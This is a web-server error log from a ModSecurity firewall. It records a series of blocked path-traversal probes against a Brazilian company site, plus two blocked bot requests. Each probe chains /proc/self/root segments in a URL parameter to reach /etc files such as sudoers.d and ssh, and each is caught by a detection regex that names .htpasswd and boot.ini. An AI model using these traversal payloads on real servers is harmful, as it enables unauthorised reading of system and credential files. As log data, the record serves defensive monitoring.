[Mon Mar 16 18:03:23.744384 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:57432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwG46lpbStxTqkSkuE1wAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:03:27.439548 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:57438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwH46lpbStxTqkSkuE2wAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:03:44.007693 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:47084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwMLysWC90G-1nBrBgZwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:03:49.151561 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:50244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwNaTCbgAP5jq5TehHlQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:03:54.114498 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:50180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwOLABkC4fWIHEf8ESIgAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:04:22.870942 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:50196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwVkr9dMAiw-8KANNk0gAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:04:57.633129 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:39016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwebysWC90G-1nBrBgwAAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:04:58.915912 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:51950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhweqQpVkWug9HeOt9PlQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:04:59.138883 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.244.31:49678] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhwe46lpbStxTqkSkuE6QAAAkw"]
[Mon Mar 16 18:05:04.135430 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:51958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwgKTCbgAP5jq5TehHowAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:05:22.590052 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:51970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwkrABkC4fWIHEf8EScQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:05:27.122906 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:50274] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwl9SswJuvopo3lOh7nAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:05:52.160309 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:56452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwr9SswJuvopo3lOh7xwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:06:49.931564 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:55852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw6dSswJuvopo3lOh8PwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:06:51.220898 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.228.16:57068] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhw66TCbgAP5jq5TehHrwAAAsk"]
[Mon Mar 16 18:06:56.848970 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:35586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw8I6lpbStxTqkSkuE-wAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:06:58.188457 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.241.46:54376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw8s_BxrYCr4hPDw8GJwAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:06:59.362814 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:54382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw87ysWC90G-1nBrBg1QAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:00.765792 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:54386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw9KQpVkWug9HeOt9PpgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:01.939184 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:54400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw9bysWC90G-1nBrBg1wAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:03.272813 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.241.46:54404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw90r9dMAiw-8KANNk5wAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:04.458490 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:54412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw-LABkC4fWIHEf8ES8AAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:05.831423 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.241.46:54414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw-c_BxrYCr4hPDw8GKAAAAc8"], 